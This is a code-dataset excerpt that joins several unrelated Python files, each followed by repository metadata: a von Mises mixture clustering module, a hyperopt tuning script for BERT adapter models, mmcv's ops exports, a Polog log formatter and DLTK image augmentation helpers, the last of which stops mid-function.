"""
wl = self.weighted_density(x)
return np.sum(wl, 1)
def responsibilities(self, x):
""" Return responsibilities
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
resp: array of shape(n, self.k)
"""
lwl = self.log_weighted_density(x)
wl = np.exp(lwl.T - lwl.mean(1)).T
swl = np.sum(wl, 1)
resp = (wl.T / swl).T
return resp
def estimate_weights(self, z):
""" Calculate and set weights from `z`
Parameters
----------
z: array of shape(self.k)
"""
self.weights = np.sum(z, 0) / z.sum()
def estimate_means(self, x, z):
""" Calculate and set means from `x` and `z`
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
z: array of shape(self.k)
"""
m = np.dot(z.T, x)
self.means = (m.T / np.sqrt(np.sum(m ** 2, 1))).T
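    # estimate_weights() and estimate_means() above form the closed-form M-step
    # of the EM loop in estimate(): the weights become the average responsibility
    # per component, and each mean is the responsibility-weighted sum of the data
    # renormalized back onto the unit sphere.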
def estimate(self, x, maxiter=100, miniter=1, bias=None):
""" Return average log density across samples
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
maxiter: int, optional,
maximum number of iterations of the algorithms
miniter=1: int, optional,
minimum number of iterations
bias: array of shape(n), optional
prior probability of being in a non-null class
Return
------
ll: float, average (across samples) log-density
"""
# initialization with random positions and constant weights
if self.weights is None:
self.weights = np.ones(self.k) / self.k
if self.null_class:
self.weights = np.ones(self.k + 1) / (self.k + 1)
if self.means is None:
aux = np.arange(x.shape[0])
np.random.shuffle(aux)
self.means = x[aux[:self.k]]
# EM algorithm
assert not(np.isnan(self.means).any())
pll = - np.infty
for i in range(maxiter):
ll = np.log(self.mixture_density(x)).mean()
z = self.responsibilities(x)
assert not(np.isnan(z).any())
# bias z
if bias is not None:
z[:, 0] *= (1 - bias)
z[:, 1:] = ((z[:, 1:].T) * bias).T
z = (z.T / np.sum(z, 1)).T
self.estimate_weights(z)
if self.null_class:
self.estimate_means(x, z[:, 1:])
else:
self.estimate_means(x, z)
assert not(np.isnan(self.means).any())
if (i > miniter) and (ll < pll + 1.e-6):
break
pll = ll
return ll
def show(self, x):
""" Visualization utility
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
"""
# label the data
z = np.argmax(self.responsibilities(x), 1)
import pylab
import mpl_toolkits.mplot3d.axes3d as p3
fig = pylab.figure()
ax = p3.Axes3D(fig)
colors = (['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] * \
(1 + (1 + self.k) / 8))[:self.k + 1]
if (self.null_class) and (z == 0).any():
ax.plot3D(x[z == 0, 0], x[z == 0, 1], x[z == 0, 2], '.',
color=colors[0])
for k in range(self.k):
if self.null_class:
if np.sum(z == (k + 1)) == 0:
continue
uk = z == (k + 1)
ax.plot3D(x[uk, 0], x[uk, 1], x[uk, 2], '.',
color=colors[k + 1])
ax.plot3D([self.means[k, 0]], [self.means[k, 1]],
[self.means[k, 2]], 'o', color=colors[k + 1])
else:
if np.sum(z == k) == 0:
continue
ax.plot3D(x[z == k, 0], x[z == k, 1], x[z == k, 2], '.',
color=colors[k])
ax.plot3D([self.means[k, 0]], [self.means[k, 1]],
[self.means[k, 2]], 'o', color=colors[k])
pylab.show()
def estimate_robust_vmm(k, precision, null_class, x, ninit=10, bias=None,
maxiter=100):
""" Return the best von_mises mixture after severla initialization
Parameters
----------
k: int, number of classes
    precision: float, a priori precision parameter
null class: bool, optional,
should a null class be included or not
    x: array of shape(n,3)
input data, should be on the unit sphere
ninit: int, optional,
        number of random initializations
bias: array of shape(n), optional
prior probability of being in a non-null class
maxiter: int, optional,
maximum number of iterations after each initialization
"""
score = - np.infty
for i in range(ninit):
aux = VonMisesMixture(k, precision, null_class=null_class)
ll = aux.estimate(x, bias=bias)
if ll > score:
best_model = aux
score = ll
return best_model
def select_vmm(krange, precision, null_class, x, ninit=10, bias=None,
maxiter=100, verbose=0):
"""Return the best von_mises mixture after severla initialization
Parameters
----------
krange: list of ints,
number of classes to consider
    precision: float, fixed precision parameter of the von Mises densities
    null class: bool, whether a null class should be included or not
    x: array of shape(n,3)
should be on the unit sphere
ninit: int, optional,
        number of random initializations
maxiter: int, optional,
bias: array of shape(n),
a prior probability of not being in the null class
verbose: Bool, optional
"""
score = - np.infty
for k in krange:
aux = estimate_robust_vmm(k, precision, null_class, x, ninit, bias,
maxiter)
ll = aux.estimate(x)
if null_class:
bic = ll - np.log(x.shape[0]) * k * 3 / x.shape[0]
else:
bic = ll - np.log(x.shape[0]) * (k * 3 - 1) / x.shape[0]
if verbose:
print k, bic
if bic > score:
best_model = aux
score = bic
return best_model
def select_vmm_cv(krange, precision, x, null_class, cv_index,
ninit=5, maxiter=100, bias=None, verbose=0):
"""Return the best von_mises mixture after severla initialization
Parameters
----------
krange: list of ints,
number of classes to consider
precision: float,
precision parameter of the von-mises densities
    x: array of shape(n, 3)
should be on the unit sphere
null class: bool, whether a null class should be included or not
cv_index: set of indices for cross validation
ninit: int, optional,
        number of random initializations
maxiter: int, optional,
bias: array of shape (n), prior
"""
score = - np.infty
mll = []
for k in krange:
mll.append( - np.infty)
for j in range(1):
ll = np.zeros_like(cv_index).astype(np.float)
for i in np.unique(cv_index):
xl = x[cv_index != i]
xt = x[cv_index == i]
bias_l = None
if bias is not None:
bias_l = bias[cv_index != i]
aux = estimate_robust_vmm(k, precision, null_class, xl,
ninit=ninit, bias=bias_l,
maxiter=maxiter)
if bias is None:
ll[cv_index == i] = np.log(aux.mixture_density(xt))
else:
bias_t = bias[cv_index == i]
lwd = aux.weighted_density(xt)
ll[cv_index == i] = np.log(lwd[:, 0] * (1 - bias_t) + \
lwd[:, 1:].sum(1) * bias_t)
if ll.mean() > mll[-1]:
mll[-1] = ll.mean()
aux = estimate_robust_vmm(k, precision, null_class, x,
ninit, bias=bias, maxiter=maxiter)
if verbose:
print k, mll[ - 1]
if mll[ - 1] > score:
best_model = aux
score = mll[ - 1]
return best_model
def sphere_density(npoints):
"""Return the points and area of a npoints**2 points sampled on a sphere
Returns
-------
s : array of shape(npoints ** 2, 3)
area: array of shape(npoints)
"""
u = np.linspace(0, 2 * np.pi, npoints + 1)[:npoints]
v = np.linspace(0, np.pi, npoints + 1)[:npoints]
s = np.vstack((np.ravel(np.outer(np.cos(u), np.sin(v))),
np.ravel(np.outer(np.sin(u), np.sin(v))),
np.ravel(np.outer(np.ones(np.size(u)), np.cos(v))))).T
area = np.abs(np.ravel(np.outer(np.ones(np.size(u)), np.sin(v)))) * \
np.pi ** 2 * 2 * 1. / (npoints ** 2)
return s, area
def example_noisy():
x1 = [0.6, 0.48, 0.64]
x2 = [-0.8, 0.48, 0.36]
x3 = [0.48, 0.64, -0.6]
x = np.random.randn(200, 3) * .1
x[:30] += x1
x[40:150] += x2
x[150:] += x3
x = (x.T / np.sqrt(np.sum(x ** 2, 1))).T
precision = 100.
vmm = select_vmm(range(2, 7), precision, True, x)
vmm.show(x)
# check that it sums to 1
s, area = sphere_density(100)
print (vmm.mixture_density(s) * area).sum()
def example_cv_nonoise():
x1 = [0.6, 0.48, 0.64]
x2 = [-0.8, 0.48, 0.36]
x3 = [0.48, 0.64, -0.6]
x = np.random.randn(30, 3) * .1
x[0::3] += x1
x[1::3] += x2
x[2::3] += x3
x = (x.T / np.sqrt(np.sum(x ** 2, 1))).T
precision = 50.
sub = np.repeat(np.arange(10), 3)
vmm = select_vmm_cv(range(1, 8), precision, x, cv_index=sub,
null_class=False, ninit=20)
vmm.show(x)
# check that it sums to 1
s, area = sphere_density(100)
return vmm
| 30.432494 | 76 | 0.501466 |
dbfb4cf457e5004a491a3c5ca35f5144c053495e
| 5,777 |
py
|
Python
|
code/torch/models/ap_glue/__main__hyperopt.py
|
siduojiang/BERTVision
|
9d0d4856300973488ead67e2d06e243bf07447ad
|
[
"MIT"
] | 5 |
2020-08-06T10:12:08.000Z
|
2022-03-17T10:38:40.000Z
|
code/torch/models/ap_glue/__main__hyperopt.py
|
siduojiang/BERTVision
|
9d0d4856300973488ead67e2d06e243bf07447ad
|
[
"MIT"
] | 9 |
2020-06-23T16:57:52.000Z
|
2021-01-17T01:52:45.000Z
|
code/torch/models/ap_glue/__main__hyperopt.py
|
cbenge509/BERTVision
|
01519bea0882fa72e86a1b62f2d0d52d22c26dfc
|
[
"MIT"
] | null | null | null |
# packages
import sys, os, random
sys.path.append("C:/BERTVision/code/torch")
from data.h5_processors.h5_processors import *
from utils.compress_utils import AdapterPooler, AP_GLUE
from common.trainers.H5_glue_trainer import H5_GLUE_Trainer
from models.ap_glue.args import get_args
import numpy as np
import torch
import torch.nn as nn
from torch.cuda.amp import GradScaler
from transformers import AdamW, get_linear_schedule_with_warmup, BertTokenizerFast
from loguru import logger
from torch.nn import MSELoss
if __name__ == '__main__':
# define an objective function
def objective(opt_args):
args = get_args()
adapter_dim, learning_rate, seed = opt_args
print("adapter_dim: %s, learning_rate: %s, seed: %s" %(str(adapter_dim), str(learning_rate), str(seed)))
# add some configs depending on checkpoint chosen
if args.checkpoint == 'bert-base-uncased':
args.n_layers = 13
args.n_features = 768
elif args.checkpoint == 'bert-large-uncased':
args.n_layers = 25
args.n_features = 1024
# instantiate data set map; pulls the right processor / data for the task
dataset_map = {
'AP_MSR': MSRH5Processor,
'AP_CoLA': COLAH5Processor,
'AP_MNLI': MNLIH5Processor,
'AP_QNLI': QNLIH5Processor,
'AP_QQP': QQPH5Processor,
'AP_RTE': RTEH5Processor,
'AP_SST': SSTH5Processor,
'AP_STSB': STSBH5Processor,
'AP_WNLI': WNLIH5Processor
}
# tell the CLI user that they mistyped the data set
if args.model not in dataset_map:
raise ValueError('Unrecognized dataset')
# set the location for saving the model
save_path = os.path.join(args.save_path, args.checkpoint, args.model)
os.makedirs(save_path, exist_ok=True)
# set the location for saving the log
log_path = os.path.join(args.log_path, args.checkpoint, args.model)
os.makedirs(log_path, exist_ok=True)
# initialize logging
logger.add(log_path + '\\' + args.model + '.log', rotation="10 MB")
logger.info(f"Training model {args.model} on this checkpoint: {args.checkpoint}")
# set device to gpu/cpu
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# detect number of gpus
n_gpu = torch.cuda.device_count()
args.device = device
args.n_gpu = n_gpu
# turn on autocast for fp16
torch.cuda.amp.autocast(enabled=True)
# set grad scaler
scaler = GradScaler()
# set seed for reproducibility
torch.backends.cudnn.deterministic = True
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
# set seed for multi-gpu
if n_gpu > 0:
torch.cuda.manual_seed_all(seed)
# instantiate model and attach it to device
model = AP_GLUE(n_layers=args.n_layers, n_batch_sz=args.batch_size, n_tokens=args.max_seq_length, n_features=args.n_features, n_labels=args.num_labels, adapter_dim = adapter_dim).to(device)
# set data set processor
processor = dataset_map[args.model]
# use it to create the train set
train_processor = processor(type='train', args=args)
# set loss
if args.num_labels == 1:
criterion = nn.MSELoss()
else:
criterion = nn.CrossEntropyLoss()
# find number of optim. steps
num_train_optimization_steps = int(len(train_processor) / args.batch_size) * args.epochs
# print metrics
logger.info(f"Device: {str(device).upper()}")
logger.info(f"Number of GPUs: {n_gpu}")
# for multi-GPU
if n_gpu > 1:
model = torch.nn.DataParallel(model)
# set optimizer
param_optimizer = list(model.named_parameters())
# exclude these from regularization
no_decay = ['bias']
# give l2 regularization to any parameter that is not named after no_decay list
# give no l2 regulariation to any bias parameter or layernorm bias/weight
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': args.l2},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}]
# set optimizer
optimizer = AdamW(optimizer_grouped_parameters,
lr=learning_rate,
correct_bias=False,
weight_decay=args.l2)
# set linear scheduler
scheduler = get_linear_schedule_with_warmup(optimizer, num_training_steps=num_train_optimization_steps,
num_warmup_steps=args.warmup_proportion * num_train_optimization_steps)
# initialize the trainer
trainer = H5_GLUE_Trainer(model, criterion, optimizer, processor, scheduler, args, scaler, logger)
# begin training / shift to trainer class
trainer.train()
# load the checkpoint
model = torch.load(trainer.snapshot_path)
return -trainer.dev_acc
# define a search space
from hyperopt import hp
adapter_dims = [2**x for x in range(3,9)]
space = [hp.choice('adapter_size', adapter_dims),
hp.uniform('learning_rate', 1e-6, 1e-3),
hp.uniformint("seed",1,2000)]
# minimize the objective over the space
from hyperopt import fmin, tpe
best = fmin(objective, space, algo=tpe.suggest, max_evals=8 * 60 * 60 / 60)
print (best)
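    # max_evals above evaluates to 480 trials (8 hours at an assumed one minute
    # per trial). hp.choice entries come back from fmin as indices into their
    # option lists; a sketch for mapping them back to concrete values, assuming
    # hyperopt's space_eval helper:
    #
    #     from hyperopt import space_eval
    #     print(space_eval(space, best))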
# main fun.
# set default configuration in args.py
| 37.75817 | 197 | 0.634759 |
24faba8878e69e1ebd8cbacabcc9566295c6dcab
| 2,769 |
py
|
Python
|
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/__init__.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
from .bbox import bbox_overlaps
from .box_iou_rotated import box_iou_rotated
from .carafe import CARAFE, CARAFENaive, CARAFEPack, carafe, carafe_naive
from .cc_attention import CrissCrossAttention
from .corner_pool import CornerPool
from .deform_conv import DeformConv2d, DeformConv2dPack, deform_conv2d
from .deform_roi_pool import (DeformRoIPool, DeformRoIPoolPack,
ModulatedDeformRoIPoolPack, deform_roi_pool)
from .deprecated_wrappers import Conv2d_deprecated as Conv2d
from .deprecated_wrappers import ConvTranspose2d_deprecated as ConvTranspose2d
from .deprecated_wrappers import Linear_deprecated as Linear
from .deprecated_wrappers import MaxPool2d_deprecated as MaxPool2d
from .focal_loss import (SigmoidFocalLoss, SoftmaxFocalLoss,
sigmoid_focal_loss, softmax_focal_loss)
from .info import (get_compiler_version, get_compiling_cuda_version,
get_onnxruntime_op_path)
from .masked_conv import MaskedConv2d, masked_conv2d
from .modulated_deform_conv import (ModulatedDeformConv2d,
ModulatedDeformConv2dPack,
modulated_deform_conv2d)
from .nms import batched_nms, nms, nms_match, nms_rotated, soft_nms
from .point_sample import (SimpleRoIAlign, point_sample,
rel_roi_point_to_rel_img_point)
from .psa_mask import PSAMask
from .roi_align import RoIAlign, roi_align
from .roi_pool import RoIPool, roi_pool
from .saconv import SAConv2d
from .sync_bn import SyncBatchNorm
from .tin_shift import TINShift, tin_shift
from .batched_rnms import batched_nms_rotated, batched_nms_rotated_ver2
from .polygon_geo import polygon_iou
from .feature_refine_module import FeatureRefineModule
__all__ = [
'bbox_overlaps', 'CARAFE', 'CARAFENaive', 'CARAFEPack', 'carafe',
'carafe_naive', 'CornerPool', 'DeformConv2d', 'DeformConv2dPack',
'deform_conv2d', 'DeformRoIPool', 'DeformRoIPoolPack',
'ModulatedDeformRoIPoolPack', 'deform_roi_pool', 'SigmoidFocalLoss',
'SoftmaxFocalLoss', 'sigmoid_focal_loss', 'softmax_focal_loss',
'get_compiler_version', 'get_compiling_cuda_version',
'get_onnxruntime_op_path', 'MaskedConv2d', 'masked_conv2d',
'ModulatedDeformConv2d', 'ModulatedDeformConv2dPack',
'modulated_deform_conv2d', 'batched_nms', 'nms', 'soft_nms', 'nms_match',
'RoIAlign', 'roi_align', 'RoIPool', 'roi_pool', 'SyncBatchNorm', 'Conv2d',
'ConvTranspose2d', 'Linear', 'MaxPool2d', 'CrissCrossAttention', 'PSAMask',
'point_sample', 'rel_roi_point_to_rel_img_point', 'SimpleRoIAlign',
'SAConv2d', 'TINShift', 'tin_shift', 'box_iou_rotated', 'nms_rotated',
'batched_nms_rotated', 'batched_nms_rotated_ver2', 'polygon_iou',
'FeatureRefineModule'
]
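# A usage sketch (argument names follow the mmcv 1.x ops API; treat them as an
# assumption and verify against the installed version):
#
#     from mmcv.ops import nms
#     dets, keep = nms(boxes, scores, iou_threshold=0.5)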
| 54.294118 | 79 | 0.763814 |
66fadaab0951d411432e75b7096de1d7cb006fa0
| 6,526 |
py
|
Python
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 30 |
2020-07-16T16:52:46.000Z
|
2022-03-24T16:56:29.000Z
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 6 |
2021-02-07T22:08:01.000Z
|
2021-12-07T21:56:46.000Z
|
polog/handlers/file/base_formatter.py
|
pomponchik/polog
|
104c5068a65b0eaeab59327aac1a583e2606e77e
|
[
"MIT"
] | 4 |
2020-12-22T07:05:34.000Z
|
2022-03-24T16:56:50.000Z
|
from polog.core.stores.levels import Levels
from polog.handlers.file.base_formatter_fields_extractors import BaseFormatterFieldsExtractors
class BaseFormatter:
"""
    This is where the raw log data is converted into the string that will be written to the file.
"""
    # Names of fields in the source data dictionary that are ignored.
    # Their content is not modified in any way.
FORBIDDEN_EXTRA_FIELDS = {
'module',
'service_name',
'exception_type',
'exception_message',
}
def __init__(self, separator):
"""
        The first stage of the object's initialization - performed when the object is created.
        Initialization is split into 2 stages.
        The first stage happens when the object is created, the second when the first log record is written.
        Here we rely on the fact that the user must finish configuring the logger before its first call. That is, until the first call we do not know all the settings exactly, so the settings are finally fixed only on the first call.
        separator - the separator between log lines, usually "\n".
"""
self.separator = separator
def __init_on_run__(self):
"""
        The second stage of the object's initialization - performed on the first call of .get_formatted_string().
        This method is called only once, after which it is no longer needed.
"""
self.FIELD_HANDLERS = self.get_base_field_handlers()
self.ALIGN_NORMS = self.get_align_norms()
def get_formatted_string(self, log):
"""
        On its first call this method is replaced by _get_formatted_string().
        Here the second initialization stage is invoked, after which the log record is written and this method is no longer needed.
"""
self.__init_on_run__()
result = self._get_formatted_string(log)
self.get_formatted_string = self._get_formatted_string
return result
def _get_formatted_string(self, log):
"""
        Starting from the second call of get_formatted_string(), this method is called directly, since it replaces get_formatted_string().
        Formatting a log record happens in 3 stages:
        1. Building a dictionary of substrings.
        2. Formatting the substrings by width.
        3. Gluing one big string together from the separate "pieces".
"""
data = self.get_dict(log)
self.width_and_align(data)
result = self.format(data)
return result
def get_base_field_handlers(self):
"""
        This method runs during the second initialization stage.
        It returns a dictionary whose keys are the names of the original log fields (not necessarily original ones - a field may simply be created with such a name) and whose values are functions that take the raw data and produce a substring from it, i.e. a piece of the future log line. These pieces are glued together later, in another method.
"""
result = {
'time': BaseFormatterFieldsExtractors.time,
'level': BaseFormatterFieldsExtractors.level,
'success': BaseFormatterFieldsExtractors.success,
'auto': BaseFormatterFieldsExtractors.auto,
'message': BaseFormatterFieldsExtractors.message,
'function': BaseFormatterFieldsExtractors.function,
'time_of_work': BaseFormatterFieldsExtractors.time_of_work,
'input_variables': BaseFormatterFieldsExtractors.input_variables,
'local_variables': BaseFormatterFieldsExtractors.local_variables,
'result': BaseFormatterFieldsExtractors.result,
'exception': BaseFormatterFieldsExtractors.exception,
'traceback': BaseFormatterFieldsExtractors.traceback,
}
return result
def get_align_norms(self):
"""
        Part of the second initialization stage. Returns a dictionary with alignment rules for individual fields.
        The values of the dictionary are 2-element tuples.
        The first element of each tuple is the field width. If the original content is shorter, it is padded with spaces.
        The second element is the alignment indicator (see https://www.python.org/dev/peps/pep-3101/#standard-format-specifiers).
"""
result = {
            'level': (max(max([len(x) for x in Levels.get_all_names()], default=2), len('UNKNOWN')), '^'), # Length of the longest logging level name.
'success': (7, '^'),
'auto': (6, '^'),
}
return result
def get_dict(self, log):
"""
        From the raw data we build a dictionary filled only with the fields we need, already formatted.
        After that it only remains to "glue" this dictionary into a single string.
"""
result = {}
self.add_base_fields(result, log)
self.add_extra_fields(result, log)
return result
def add_base_fields(self, base, log):
"""
        Base fields are the ones that have dedicated handlers registered in self.FIELD_HANDLERS.
        Here we call all of those handlers.
"""
for field_name, extractor in self.FIELD_HANDLERS.items():
try:
value = extractor(log)
except:
try:
value = str(log[field_name])
except:
value = None
if value is not None:
base[field_name] = value
def add_extra_fields(self, base, log):
"""
        Add to the data dictionary the fields that are absent from self.FIELD_HANDLERS.
"""
for field_name, value in log.items():
if field_name not in base:
if field_name not in self.FORBIDDEN_EXTRA_FIELDS:
if value is not None:
base[field_name] = f'{field_name}: "{value}"'
def format(self, data):
"""
        Take the dictionary with already formatted data and turn it into a string.
"""
values = data.values()
return ' | '.join(values) + self.separator
def width_and_align(self, data):
"""
        Formatting norms are defined for some fields (self.ALIGN_NORMS). Here those norms are applied.
        data - the dictionary with the log fields.
"""
for field_name in self.ALIGN_NORMS:
item = data.get(field_name, None)
if item is not None:
width, align = self.ALIGN_NORMS[field_name]
value = f'{item:{align}{width}}'
data[field_name] = value
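# A minimal usage sketch (the field values below are hypothetical; in Polog the
# log record normally comes from the logger itself):
#
#     formatter = BaseFormatter('\n')
#     line = formatter.get_formatted_string({'level': 'INFO', 'message': 'hello'})
#
# The first call runs the second initialization stage and then rebinds
# get_formatted_string to _get_formatted_string for all subsequent calls.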
| 41.833333 | 316 | 0.646184 |
7a944e38333ac85d32ef53e74b9bb1188da86627
| 10,589 |
py
|
Python
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 1,397 |
2017-05-02T15:41:18.000Z
|
2022-03-26T20:40:09.000Z
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 50 |
2017-06-13T15:43:04.000Z
|
2022-02-09T23:26:31.000Z
|
dltk/io/augmentation.py
|
UncleStotheh/DLTK
|
e1591629d45459c0739ad89aea8cd5484221df7a
|
[
"Apache-2.0"
] | 436 |
2017-06-12T20:56:02.000Z
|
2022-03-09T15:00:43.000Z
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import numpy as np
from scipy.ndimage.interpolation import map_coordinates
from scipy.ndimage.filters import gaussian_filter
def flip(imagelist, axis=1):
"""Randomly flip spatial dimensions
Args:
imagelist (np.ndarray or list or tuple): image(s) to be flipped
axis (int): axis along which to flip the images
Returns:
np.ndarray or list or tuple: same as imagelist but randomly flipped
along axis
"""
# Check if a single image or a list of images has been passed
was_singular = False
if isinstance(imagelist, np.ndarray):
imagelist = [imagelist]
was_singular = True
    # With a probability of 0.5 flip the image(s) across `axis`
do_flip = np.random.random(1)
if do_flip > 0.5:
for i in range(len(imagelist)):
imagelist[i] = np.flip(imagelist[i], axis=axis)
if was_singular:
return imagelist[0]
return imagelist
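# A small usage sketch: flipping an image together with its label map keeps the
# two aligned, since the random decision is shared across the whole list.
#
#     image, label = flip([image, label], axis=1)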
def add_gaussian_offset(image, sigma=0.1):
"""
Add Gaussian offset to an image. Adds the offset to each channel
independently.
Args:
image (np.ndarray): image to add noise to
sigma (float): stddev of the Gaussian distribution to generate noise
from
Returns:
np.ndarray: same as image but with added offset to each channel
"""
offsets = np.random.normal(0, sigma, ([1] * (image.ndim - 1) + [image.shape[-1]]))
image += offsets
return image
def add_gaussian_noise(image, sigma=0.05):
"""
Add Gaussian noise to an image
Args:
image (np.ndarray): image to add noise to
sigma (float): stddev of the Gaussian distribution to generate noise
from
Returns:
        np.ndarray: same as image but with added Gaussian noise
"""
image += np.random.normal(0, sigma, image.shape)
return image
def elastic_transform(image, alpha, sigma):
"""
Elastic deformation of images as described in [1].
[1] Simard, Steinkraus and Platt, "Best Practices for Convolutional
Neural Networks applied to Visual Document Analysis", in Proc. of the
International Conference on Document Analysis and Recognition, 2003.
Based on gist https://gist.github.com/erniejunior/601cdf56d2b424757de5
Args:
image (np.ndarray): image to be deformed
alpha (list): scale of transformation for each dimension, where larger
values have more deformation
sigma (list): Gaussian window of deformation for each dimension, where
smaller values have more localised deformation
Returns:
np.ndarray: deformed image
"""
assert len(alpha) == len(sigma), \
"Dimensions of alpha and sigma are different"
channelbool = image.ndim - len(alpha)
out = np.zeros((len(alpha) + channelbool, ) + image.shape)
# Generate a Gaussian filter, leaving channel dimensions zeroes
for jj in range(len(alpha)):
array = (np.random.rand(*image.shape) * 2 - 1)
out[jj] = gaussian_filter(array, sigma[jj],
mode="constant", cval=0) * alpha[jj]
# Map mask to indices
shapes = list(map(lambda x: slice(0, x, None), image.shape))
grid = np.broadcast_arrays(*np.ogrid[shapes])
indices = list(map((lambda x: np.reshape(x, (-1, 1))), grid + np.array(out)))
# Transform image based on masked indices
transformed_image = map_coordinates(image, indices, order=0,
mode='reflect').reshape(image.shape)
return transformed_image
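# A usage sketch (shapes are illustrative): deform a single-channel 2D image,
# giving one alpha/sigma entry per spatial axis (the channel axis is excluded).
#
#     img = np.random.rand(64, 64, 1)
#     warped = elastic_transform(img, alpha=[1000, 1000], sigma=[8, 8])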
def extract_class_balanced_example_array(image,
label,
example_size=[1, 64, 64],
n_examples=1,
classes=2,
class_weights=None):
"""Extract training examples from an image (and corresponding label) subject
to class balancing. Returns an image example array and the
corresponding label array.
Args:
image (np.ndarray): image to extract class-balanced patches from
label (np.ndarray): labels to use for balancing the classes
example_size (list or tuple): shape of the patches to extract
n_examples (int): number of patches to extract in total
        classes (int or list or tuple): number of classes or list of classes
            to extract
        class_weights (list or tuple, optional): relative sampling weight per
            class; defaults to sampling all classes uniformly
Returns:
np.ndarray, np.ndarray: class-balanced patches extracted from full
images with the shape [batch, example_size..., image_channels]
"""
assert image.shape[:-1] == label.shape, 'Image and label shape must match'
assert image.ndim - 1 == len(example_size), \
        "Example size doesn't fit image size"
assert all([i_s >= e_s for i_s, e_s in zip(image.shape, example_size)]), \
'Image must be larger than example shape'
rank = len(example_size)
if isinstance(classes, int):
classes = tuple(range(classes))
n_classes = len(classes)
assert n_examples >= n_classes, \
'n_examples need to be greater than n_classes'
if class_weights is None:
n_ex_per_class = np.ones(n_classes).astype(int) * int(np.round(n_examples / n_classes))
else:
assert len(class_weights) == n_classes, \
'Class_weights must match number of classes'
class_weights = np.array(class_weights)
n_ex_per_class = np.round((class_weights / class_weights.sum()) * n_examples).astype(int)
# Compute an example radius to define the region to extract around a
# center location
ex_rad = np.array(list(zip(np.floor(np.array(example_size) / 2.0),
np.ceil(np.array(example_size) / 2.0))),
dtype=np.int)
class_ex_images = []
class_ex_lbls = []
min_ratio = 1.
for c_idx, c in enumerate(classes):
# Get valid, random center locations belonging to that class
idx = np.argwhere(label == c)
ex_images = []
ex_lbls = []
if len(idx) == 0 or n_ex_per_class[c_idx] == 0:
class_ex_images.append([])
class_ex_lbls.append([])
continue
# Extract random locations
r_idx_idx = np.random.choice(len(idx),
size=min(n_ex_per_class[c_idx], len(idx)),
replace=False).astype(int)
r_idx = idx[r_idx_idx]
# Shift the random to valid locations if necessary
r_idx = np.array(
[np.array([max(min(r[dim], image.shape[dim] - ex_rad[dim][1]),
ex_rad[dim][0]) for dim in range(rank)])
for r in r_idx])
for i in range(len(r_idx)):
# Extract class-balanced examples from the original image
slicer = [slice(r_idx[i][dim] - ex_rad[dim][0], r_idx[i][dim] + ex_rad[dim][1]) for dim in range(rank)]
ex_image = image[slicer][np.newaxis, :]
ex_lbl = label[slicer][np.newaxis, :]
# Concatenate them and return the examples
ex_images = np.concatenate((ex_images, ex_image), axis=0) \
if (len(ex_images) != 0) else ex_image
ex_lbls = np.concatenate((ex_lbls, ex_lbl), axis=0) \
if (len(ex_lbls) != 0) else ex_lbl
class_ex_images.append(ex_images)
class_ex_lbls.append(ex_lbls)
ratio = n_ex_per_class[c_idx] / len(ex_images)
min_ratio = ratio if ratio < min_ratio else min_ratio
indices = np.floor(n_ex_per_class * min_ratio).astype(int)
ex_images = np.concatenate([cimage[:idxs] for cimage, idxs in zip(class_ex_images, indices)
if len(cimage) > 0], axis=0)
ex_lbls = np.concatenate([clbl[:idxs] for clbl, idxs in zip(class_ex_lbls, indices)
if len(clbl) > 0], axis=0)
return ex_images, ex_lbls
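# A usage sketch (illustrative shapes): draw 8 class-balanced patches from a
# [depth, height, width, channels] image and its integer label map.
#
#     ex_img, ex_lbl = extract_class_balanced_example_array(
#         image, label, example_size=[16, 64, 64], n_examples=8, classes=2)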
def extract_random_example_array(image_list,
example_size=[1, 64, 64],
n_examples=1):
"""Randomly extract training examples from image (and a corresponding label).
Returns an image example array and the corresponding label array.
Args:
image_list (np.ndarray or list or tuple): image(s) to extract random
patches from
example_size (list or tuple): shape of the patches to extract
n_examples (int): number of patches to extract in total
Returns:
np.ndarray, np.ndarray: class-balanced patches extracted from full
images with the shape [batch, example_size..., image_channels]
"""
assert n_examples > 0
was_singular = False
if isinstance(image_list, np.ndarray):
image_list = [image_list]
was_singular = True
assert all([i_s >= e_s for i_s, e_s in zip(image_list[0].shape, example_size)]), \
'Image must be bigger than example shape'
assert (image_list[0].ndim - 1 == len(example_size) or image_list[0].ndim == len(example_size)), \
        "Example size doesn't fit image size"
for i in image_list:
if len(image_list) > 1:
assert (i.ndim - 1 == image_list[0].ndim or i.ndim == image_list[0].ndim or i.ndim + 1 == image_list[0].ndim),\
                "Example size doesn't fit image size"
assert all([i0_s == i_s for i0_s, i_s in zip(image_list[0].shape, i.shape)]), \
'Image shapes must match'
rank = len(example_size)
# Extract random examples from image and label
valid_loc_range = [image_list[0].shape[i] - example_size[i] for i in range(rank)]
rnd_loc = [np.random.randint(valid_loc_range[dim], size=n_examples)
if valid_loc_range[dim] > 0
else np.zeros(n_examples, dtype=int) for dim in range(rank)]
examples = [[]] * len(image_list)
for i in range(n_examples):
